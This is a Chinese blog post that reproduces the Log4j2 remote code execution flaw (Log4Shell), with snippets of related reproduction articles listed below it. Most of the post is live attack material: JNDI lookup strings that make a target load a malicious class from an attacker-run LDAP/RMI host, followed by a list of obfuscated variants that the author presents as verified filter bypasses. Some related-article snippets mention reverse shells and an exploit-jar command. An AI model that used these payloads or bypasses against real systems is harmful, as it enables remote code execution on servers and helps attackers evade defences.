Apache-Log4j2复现过程

最新推荐文章于 2024-07-17 17:13:42 发布
最新推荐文章于 2024-07-17 17:13:42 发布
阅读量676 收藏 1
点赞数
分类专栏: 学海无涯 文章标签: apache 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38656841/article/details/122270405
版权

 

复现过程

首先在攻击者的服务器上搭建两个服务

第一个:服务网站上放恶意的class类。

其中class文件未编译前的内容是如下:

然后第二个:

开启ldap或者rmi等服务(我这里用ldap)

 然后将漏洞请求发过去

${jndi:ldap://ip:port/#Exploit}

${jndi:ldap://1.1.1.1:9999/#Exploit}

Apache Log4j2 远程代码执行漏洞

目标机收到后就会通过我的请求> 调用远程ldap  >   ldap再去请求恶意类  >  恶意类在原路返回到被攻击的机器上。  >   靶机就会执行恶意类中的命令.

我这里弹到的是log平台上

另外经验证,可通过如下方式进行绕过:

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1:1099/ass}

${${::-j}ndi:rmi://127.0.0.1:1099/ass}

${jndi:rmi://adsasd.asdasd.asdasd}

${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}

${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}

${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}

${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://adsasd.asdasd.asdasd/poc}

时光凉春衫薄
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Apache Log4j-漏洞复现(CVE-2021-44228)
千寻的博客
12-22 3151
文章目录漏洞描述漏洞编号影响范围FOFA环境搭建漏洞复现漏洞复现-反弹shell参考连接摘抄 漏洞描述 Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。 该工具重写了Log4j框架,并且引入了大量丰富的特性。 我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。 该日志框架被大量用于业务系统开发,用来记录日志信息。 Apace在其2.0到2.14.1版本中存在一
apache log4j2vulfocus靶场漏洞复现
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-21 1306
Apache Log4j2被曝出一个高危漏洞,攻击者通过jndi注入攻击的形式可以轻松远程执行任何代码。apache log4j2vulfocus靶场漏洞复现,随后官方紧急推出了2.15.0和2.15.0-rc1新版本修复,依然未能完全解决问题,现在已经更新到2.15.0-rc2(近日已推出2.16版本)。该漏洞被命名为Log4Shell,编号CVE-2021-44228 一、环境搭建-vulfocus靶场,本次漏洞复现采用vulfocus的log4j2靶场docker,使用Kali系统进行复现实验。
Apache Log4j2漏洞复现
weixin_51151498的博客
01-23 1438
Apache Log4j2漏洞
Log4j2漏洞复现&原理&补丁绕过
最新发布
无问社区的博客
07-17 506
我tm都呕了,昨晚出了这个洞,在家复现半天没搞出来,然后凌晨快两点的时候成功了两次,然后又不行,然后睡了,贼jb真实。然后今天来公司随便搞了两下就成功了,唯一的变化就是换了台电脑,贼jb恐怖。经过测试就是jdk版本的问题。0x02 漏洞复现这里我一共使用了两个jdk版本8u202的情况比较特殊,其实我今天凌晨在家里用的也是8u202的版本,失败了。今天来公司也是用的8u202版本的jdk,成功了。
log4j2复现(小宇特详解)
小宇的web博客
02-19 789
log4j2复现(小宇特详解) 简介 ApacheLog4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架与Web应用中。 漏洞概述 该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。 log4j2是调用了jndi来查询一些信息然后记录到了日志里面。 jndi是java一套资源和使用的接口,用来将各种资源做整合 idap是一种文件访问协议,用来获取文件资源 rmi是远程方法执行,是RPC的纯java实现方
Apache_log4j2(CVE-2021-44228)复现
weixin_48645404的博客
12-19 152
我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。通过DNSLog平台(http://www.dnslog.cn/)获取到域名xxx.dnslog.cn,构造payload ${jndi:ldap://http://xxx.dnslog.cn}此处kali得ip为192.168.14.131 端口设置未使用得端口 并将反弹shell进行java runtime bash 编码。端口监听到数据 并且可以进行命令执行。
手把手教你复现apache log4j2 漏洞
叶新东老师的博客
12-15 4564
前言 因为log4j2是java的日志框架, 所在这边也使用java进行测试,需要注意的是,log4j2的版本从2.0 ~ 2.14.1之间都是有安全漏洞的, 在2.15版本(包含2.15)后就已经修复了这个漏洞;所以我们在复现时只要版本不超过2.15即可; 准备 在复现前,需要先准备以下几样东西 nginx:无版本限制 Intellij idea :用来编写jmdi 服务端代码,和测试log日志 log4j 依赖:(maven自动下载) 开整 因为是远程执行漏洞嘛,所以肯定需要用到不同的工程,这里准备
Apache-Log4j的几种复现方式
weixin_48465105的博客
12-15 627
Apache-Log4j的几种复现方式 poc来自 https://github.com/tangxiaofeng7/apache-log4j-poc 1、使用./tools/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar vps IP 假设为 10.10.10.10 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “calc.exe” -A 10.10.10.10 [root@VM_0_16_cent
【漏洞复现Apache Log4j2 远程代码执行漏洞
做自己喜欢的事,并将其发挥到极致!
07-20 901
ApacheLog4j2是一个·基于Java的日志记录工具,该工具重写了Log4j框架,并且引入大量丰富的特性,该日志框架被大量用于业务系统开发,用来记录日志信息。由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。......
log4j 漏洞CVE-2021-44228 漏洞复现
kyliuw的博客
03-08 6062
log4j 漏洞CVE-2021-44228 漏洞复现
Apache log4j2漏洞复现
unlash的博客
09-16 222
vulhub靶场log4j2漏洞复现,全网最详细过程 CVE-2021-44228漏洞复现 log4j2漏洞原理,修复建议
log4j2复现
weixin_65219040的博客
06-18 550
目录环境搭建log4j2 DNSLog测试JNDI注入反弹shell 靶机:Ubuntu 5.4.0-117-generic   192.168.6.183 攻击机:Kali 5.16.0-kali7-amd64 192.168.6.212 靶机: #首先拉一个docker镜像 docker pull vulfocus/vulfocus #查看镜像 docker images #启动 docker run -d -p 8081:80 -v /var/run/docker.sock:/var
log4j2问题复现
weixin_44676079的博客
12-14 224
log4j2BUG
Log4j2 RCE 漏洞复现步骤以及根因
weixin_46073333的博客
12-12 6815
相信大家最近一定被log4j2的远程代码执行漏洞所刷屏了,各个互联网厂商,开源组织,还有相关企业都瑟瑟发抖,相关研发人员也都是加班加点紧急修复和改正。笔者也看了一些相关文章,感觉不少都...
2021-12-10 log4j2 漏洞复现
qq_35745341的博客
12-10 4478
log4j2 漏洞复现 https://github.com/welk1n/JNDI-Injection-Exploit 1、运行该github项目(用idea运行ServerStart的main方法或运行jar包,jar包上面github地址有提供) 注意windows与mac的不同 ,jdk1.8及以下 运行jar包命令: java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "C:\Windows\System32\calc.exe" -A
Apache Log4j2 远程代码执行漏洞复现
renyizou的博客
03-06 5062
靶场: Vulfocus 靶场环境 目前 Vulfocus 已经集成 Log4j2 环境,可通过以下链接启动环境测试:http://vulfocus.fofa.so/#/dashboard?image_id=3b8f15eb-7bd9-49b2-a69e-541f89c4216c 也可通过 docker pull vulfocus/log4j2-rce-2021-12-09:latest 拉取本地环境运行。 漏洞复现: 我是本地复现: 环境: *服务器地址:kali ip(192.168.30.1
Log4j2漏洞复现
qq_38675102的博客
02-21 551
vulhub靶场Log4j2漏洞复现
apache log4j2 漏洞复现
06-28
Apache Log4j2漏洞是一种远程代码执行漏洞,攻击者可以利用该漏洞在受影响的服务器上执行任意代码。攻击者可以通过构造特定的请求,将恶意代码注入到受影响的服务器上,从而实现远程代码执行。该漏洞已被广泛利用,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

时光凉春衫薄

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值